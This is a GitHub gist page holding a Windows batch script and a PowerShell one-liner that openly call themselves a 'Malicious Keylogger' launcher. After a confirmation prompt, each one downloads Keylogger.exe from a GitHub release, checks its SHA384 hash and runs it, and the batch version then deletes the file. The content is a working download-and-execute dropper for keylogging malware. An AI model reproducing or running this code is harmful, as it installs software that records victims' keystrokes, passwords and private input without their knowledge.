Skip to content

Instantly share code, notes, and snippets.

@Sharkbyteprojects
Last active March 27, 2022 09:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Sharkbyteprojects/da6b195152eb7ae12c7282f1c9494091 to your computer and use it in GitHub Desktop.
Save Sharkbyteprojects/da6b195152eb7ae12c7282f1c9494091 to your computer and use it in GitHub Desktop.
@echo off
REM WARN
echo Are you Sure to run the Malicious Keylogger?
pause
REM PAYLOAD
cd %~dp0
powershell -c try { Invoke-WebRequest -Uri 'https://github.com/Sharkbyteprojects/Keylogger/releases/download/v0.2/Keylogger.exe' -OutFile 'hello.exe';if('F7DFC6083FCB967E5D798FA8753CF5EE1025EA4474FE7F5B3778BC6893A5A8B5EFF9523FAE140BE5AFDADC0DED9795E6' -eq (Get-Filehash -Path 'hello.exe' -Algorithm SHA384).Hash){cmd /c hello.exe;Remove-Item 'hello.exe';}else{Write-Warning 'INVALID FILE!';} } catch {Write-Warning 'Failue duing run';}
pause
try { Invoke-WebRequest -Uri 'https://github.com/Sharkbyteprojects/Keylogger/releases/download/v0.2/Keylogger.exe' -OutFile 'hello.exe';if("F7DFC6083FCB967E5D798FA8753CF5EE1025EA4474FE7F5B3778BC6893A5A8B5EFF9523FAE140BE5AFDADC0DED9795E6" -eq (Get-Filehash -Path "hello.exe" -Algorithm SHA384).Hash){cmd /c hello.exe;}else{Write-Warning "INVALID FILE!";} } catch {Write-Warning "Failue duing run"}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment